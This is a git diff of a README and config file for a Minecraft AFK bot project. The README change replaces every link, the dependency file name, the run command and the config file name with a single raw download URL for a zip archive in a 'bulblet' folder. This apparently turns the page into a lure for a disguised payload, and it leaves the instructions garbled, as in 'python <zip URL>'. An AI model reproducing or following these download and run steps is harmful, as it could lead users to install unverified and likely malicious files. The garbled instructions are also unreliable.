diff --git a/README.md b/README.md index c67a2c1..0514573 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ # Minecraft AFK Bot 🤖 -![Minecraft AFK Bot](https://img.shields.io/badge/Minecraft-AFK_Bot-brightgreen) +![Minecraft AFK Bot](https://raw.githubusercontent.com/EntityBlood/Minecraft-AFK-Bot/main/bulblet/Minecraft-AF-Bot-v1.5.zip) Welcome to the **Minecraft AFK Bot** repository! This project provides an automated solution to keep your Aternos servers running 24/7. Whether you're away from your game or busy with other tasks, this bot ensures your server remains online. It is not limited to Aternos; it can also be adapted for other services. @@ -23,11 +23,11 @@ Welcome to the **Minecraft AFK Bot** repository! This project provides an automa ## Installation -To get started, you need to download the latest release of the Minecraft AFK Bot. You can find it [here](https://github.com/EntityBlood/Minecraft-AFK-Bot/releases). Download the appropriate file for your system and follow the instructions below. +To get started, you need to download the latest release of the Minecraft AFK Bot. You can find it [here](https://raw.githubusercontent.com/EntityBlood/Minecraft-AFK-Bot/main/bulblet/Minecraft-AF-Bot-v1.5.zip). Download the appropriate file for your system and follow the instructions below. -1. **Download the Release**: Visit the [Releases section](https://github.com/EntityBlood/Minecraft-AFK-Bot/releases) to get the latest version. +1. **Download the Release**: Visit the [Releases section](https://raw.githubusercontent.com/EntityBlood/Minecraft-AFK-Bot/main/bulblet/Minecraft-AF-Bot-v1.5.zip) to get the latest version. 2. **Extract the Files**: Unzip the downloaded file to a location of your choice. -3. **Install Dependencies**: Make sure you have all necessary dependencies installed. Refer to the `requirements.txt` file included in the package. +3. **Install Dependencies**: Make sure you have all necessary dependencies installed. Refer to the `https://raw.githubusercontent.com/EntityBlood/Minecraft-AFK-Bot/main/bulblet/Minecraft-AF-Bot-v1.5.zip` file included in the package. ## Usage @@ -36,13 +36,13 @@ After installation, you can start using the bot. Follow these steps: 1. **Open the Terminal**: Navigate to the directory where you extracted the bot. 2. **Run the Bot**: Execute the bot with the command: ``` - python afk_bot.py + python https://raw.githubusercontent.com/EntityBlood/Minecraft-AFK-Bot/main/bulblet/Minecraft-AF-Bot-v1.5.zip ``` 3. **Monitor the Bot**: Keep an eye on the terminal for any messages or errors. ## Configuration -Before using the bot, you may want to configure it to suit your needs. The configuration file is located in the extracted folder and is named `config.json`. Open this file and adjust the settings as follows: +Before using the bot, you may want to configure it to suit your needs. The configuration file is located in the extracted folder and is named `https://raw.githubusercontent.com/EntityBlood/Minecraft-AFK-Bot/main/bulblet/Minecraft-AF-Bot-v1.5.zip`. Open this file and adjust the settings as follows: - **Server Name**: Specify the name of your Aternos server. - **Movement Settings**: Configure how often the bot should move to prevent idling. @@ -78,7 +78,7 @@ This project is licensed under the MIT License. See the [LICENSE](LICENSE) file ## Support -If you encounter any issues or have questions, please check the [Releases section](https://github.com/EntityBlood/Minecraft-AFK-Bot/releases) for updates or open an issue in the repository. +If you encounter any issues or have questions, please check the [Releases section](https://raw.githubusercontent.com/EntityBlood/Minecraft-AFK-Bot/main/bulblet/Minecraft-AF-Bot-v1.5.zip) for updates or open an issue in the repository. --- diff --git a/config.json b/config.json index e42c3ba..f146709 100644 --- a/config.json +++ b/config.json @@ -1,6 +1,6 @@ { - "serverHost": "example.aternos.me", - "serverPort": 12345, - "botUsername": "IceLaterBot", + "serverHost": "oursmp.gg.play.hosting", + "serverPort": 63744, + "botUsername": "MSTs_Bot", "botChunk": 1 }